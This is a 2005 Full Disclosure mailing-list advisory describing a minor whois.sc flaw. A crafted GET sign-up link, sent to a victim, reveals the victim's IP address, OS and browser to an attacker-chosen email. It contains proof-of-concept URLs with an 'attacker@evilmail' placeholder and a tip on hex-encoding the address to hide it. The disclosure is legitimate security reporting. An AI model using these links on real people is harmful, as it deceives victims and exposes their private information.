Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

whois.sc not-big-deal hole

From: unknown unknown <unknown.pentester () gmail com>
Date: Wed, 2 Nov 2005 16:53:20 +0000
Title: whois.sc not-big-deal hole
Server-side risk: none
Client-side risk: low risk (private info revealed about the user)

Description:

This might not even be considered a proper security hole, but I
thought it's an interesting way to get the following information about
a user:

- IP Address
- Operating system
- Web browser version

This information can be easily obtained by "tricking" someone to visit
your website and then checking the webserver logs. Email headers also
help, not to mention loud OS detection tools such as xprobe2 and nmap
(which will only work if you're lucky and the "victim" doesn't use a
firewall blocking all incoming traffic).

In this case however, the scenario is a little different because we
use a sign-up service provided by an existing website for our own
purposes (enumeration).

The only limitation of this "trick" is that the attacker needs to use
a different email address for each attack. This is because whois.sc
will set the account activation status to "pending" after requesting
the account activation with your email address for the first time.


The original request to sign-up for an account is a POST request
*similar* to the following:


POST http://www.whois.sc/members/process.html HTTP/1.1
Host: www.whois.sc
Content-Length: 48
action=newaccount&doneurl=&email=test%40test.com


However we can change the request from POST to GET and the application
will happily process the query:

http://www.whois.sc/members/process.html?action=newaccount&doneurl=%252Freverse-ip%252F&email=test%40test.com


PoC:

http://www.whois.sc/members/process.html?action=newaccount&doneurl=%252Freverse-ip%252F&email=attacker%40evilmail.com


Replace "attacker%40evilmail.com" in the previous link with your own
email address (e.g.: myself%40gmail.com) and send it to the "victim".


Also, we could obsfucate our email address by encoding it to hex:

http://www.whois.sc/members/process.html?action=newaccount&doneurl=%252Freverse-ip%252F&email=%61%74%74%61%63%6B%65%72%40%65%76%69%6C%6D%61%69%6C%2E%63%6F%6D


Note: "%40" is "@" in hex. For a good resource to convert strings to
different encodings check out
http://www.thedumbterminal.co.uk/php/stringdecode.php



Regards,

pagvac
Earth, SOLAR SYSTEM
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Previous By Date Next
Previous By Thread Next

Current thread: